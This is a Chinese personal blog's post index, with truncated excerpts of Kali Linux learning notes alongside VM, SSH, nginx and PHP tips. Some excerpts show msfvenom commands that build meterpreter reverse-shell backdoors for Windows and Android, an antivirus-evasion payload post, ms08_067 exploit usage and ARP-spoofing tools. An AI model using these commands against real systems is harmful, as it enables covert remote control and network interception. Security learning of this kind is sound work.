Kind&红衣的博客

Don`t worry about finding your soul mate.Find yourself。

VM虚拟机陨石坑大全,不定期更新

  0x01:无法打开已存在的虚拟机(虚拟机配置文件.vmx) 陨石坑- - 更新时间:2018年8月13日07:09:04 解决:把共享虚拟机关了就行了 完成图: 0x02: 重启就没网络了,依稀记得折腾了我不止半个月因此还换过好几个虚拟机(陨石天坑不解释) 更新时间:2018...

2018-08-13 07:19:21

阅读数 154

评论数 0

Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload

环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指...

2018-08-13 03:18:10

阅读数 2249

评论数 0

kali的学习笔记篇(七)metasploit之PC后门

//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe &am...

2018-08-12 07:37:24

阅读数 462

评论数 0

白帽子讲web安全之浏览器安全(二)同源策略

(一)同源策略: 源(Origin) 浏览器最核心最基础的安全功能,web建立在同源策略之上。 作用:限制了不同Origin之间的document和脚本,相互间不能干扰。 影响Origin的因素有host(域名或IP地址) 下方例子在a.com中加载了b.com的b.js,那么它的Ori...

2018-08-12 03:51:36

阅读数 80

评论数 0

kali的学习笔记篇(一)基础入门

2018年7月30日 07:01:27 环境:win10自带Hyper-v虚拟机 系统:最新版2.0kali ISO镜像文件。 kali-linux-2018.2-i386.iso 在控制面板《开启哪些程序》里开启Hyper-v平台 打开任务管理器点击性能点击CPU查看是否开启虚拟化,...

2018-08-12 03:47:23

阅读数 1511

评论数 1

kali的学习笔记篇(五)metasploit之PC后门参数集

参数列表: show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找met...

2018-08-12 02:33:19

阅读数 207

评论数 0

kali的学习笔记篇(六)metasploit之安卓后门

环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听 0x01: //生成安卓木马: msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=5555...

2018-08-12 02:28:37

阅读数 1047

评论数 2

kali的学习笔记篇(四)metasploit之远控

看的是15年的老电影了(教程) msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。 生成木马: #参数 -p [指定攻击载荷名称] #参数 -f [指定payload的输出格式] #参数 -x 指定捆绑到哪个文件上 msfvenom -p windows/m...

2018-08-11 05:51:29

阅读数 472

评论数 0

kali的学习笔记篇(三)Metasploit初试炼

exploit:利用漏洞 payload:攻击载荷 #进入msf控制台 msfconsole help查看帮助信息 show 显示攻击载荷 开始攻击 #装载攻击载荷选择windows系统模块/ms08_067漏洞 use exploit/windows/smb/ms08_067_n...

2018-08-11 04:28:04

阅读数 144

评论数 0

Kali Linux / centOS 7 SSH踩过得坑(不定期更新)

0x00: 最近学习kali linux,闻之初是三年前了。随已不是从前计划中的自己,但也尽力去突破新的自己。       环境:kali-linux 2018-2amd64镜像 0x01:关于ssh输入密码无法登陆的坑 cause :一开始好好的,开机后就连接不上了。看了看/etc/ssh...

2018-08-11 00:26:11

阅读数 628

评论数 0

putty vi右键不能黏贴

环境:kali2018镜像,Hyper-v虚拟机 背景:在设置好ssh远程登录后使用putty打开source文件添加更新源 结果复制的更新源右键无法黏贴,   解决: 方法一:在普通模式下键入“ :set mouse-=a”(不包括引号) 方法二:编辑 ~/.vimrc 文件,加入如...

2018-08-10 04:35:19

阅读数 722

评论数 0

关于linux下用户与组的安全知识(一)

环境:centOS 7 搭建好了开发环境,接下来翻阅一些安全知识,打算从《白帽子讲web安全》中提及的最小权限原则开始对服务器进行安全部署。 翻阅了一些关于linux下用户与组的知识,本人小白大佬略过。 查看当前登录用户:whoami 一般回显root 查看当前组内成员:groups 查...

2018-08-02 04:12:44

阅读数 58

评论数 0

centOS 7配置ssh 限制ip登录

环境:centOS 7.0 在网站备案完毕后部署完服务器打算进一步设置一些安全部署,网上搜罗了一些这方面的文章,打算先执行《白帽子讲web安全》中提及的最小权限原则。 PS:因本人外网ip非固定ip除了方法一在putty中配置没问题外没有在其余外网ip亲测(- -公司也不搞个固定ip,我还能说...

2018-08-02 03:06:46

阅读数 3147

评论数 0

kali的学习笔记篇(二)ARP入门实战篇

环境:kali2.0 kali-linux-2018.2-i386.iso 工具: arpspoof  ARP断网工具 ettercap ARP欺骗工具 driftnet  图片劫持   ARP断网攻击: ifconfig //获取网卡信息 fping -asg 192.168....

2018-07-31 19:11:25

阅读数 177

评论数 0

白帽子讲web安全之安全原则(一)安全原则

安全原则 (一)白名单原则:当使用了黑名单原则后可能会造成权限绕过,应该使用白名单原则。 例如:以后浏览器更新了新的html标签,黑名单中没有,那么可能就会造成安全隐患 (二)最小权限原则: 按需赋予权限,按需上调(类似灰度发布模型) (三)纵深防御原则: 1,从多个角度去设计安全方案...

2018-07-24 22:30:11

阅读数 85

评论数 0

记录一次https的坑

环境:php tp5 lnmp 加入https后访问网站正常。而一旦提交表单就404 找了半天没搞懂,http正常提交相应。 https404 后来勉强算是找到了解决方法(毫无卵用) 使用tp5的url兼容模式提交?s=模块/控制器/方法 继续寻找问题,官方说是服务器不支持phpinf...

2018-07-21 04:48:27

阅读数 97

评论数 0

开启gzip压缩

http{}: gzip on;      46         gzip_min_length  1k;      47         gzip_buffers     4 16k;      48         gzip_http_version 1.1;      49        ...

2018-07-20 20:00:55

阅读数 212

评论数 0

ssl 此页中包含其他不安全资源

本页不但包含安全的内容,也包含不安全的内容     为什么会出现这种安全提示呢?因为SSL证书对网站代码的安全性要求很高,但许多用户网站中却使用了大量的外链,而这些外部的资源(图片或js)正是不安全的因素所在,因此用户在部署SSL证书后需要对网站代码进行调整,这样才能保障网站的安全;在部署S...

2018-07-18 21:08:06

阅读数 597

评论数 0

TP5使用redis

use think\Cache;//redis对象        public function getRedis()        {         $options = [        'type'  => 'redis',//指定类型        'passwor...

2018-07-13 19:26:29

阅读数 1441

评论数 0

校验手机号营运商

进攻参考    public function telpohone($varibale)    {        // $telp = '';// var_dump($varibale);        $tel ['移动'] =          [        '134','135','13...

2018-07-13 19:24:36

阅读数 87

评论数 0

提示
确定要删除当前文章?
取消 删除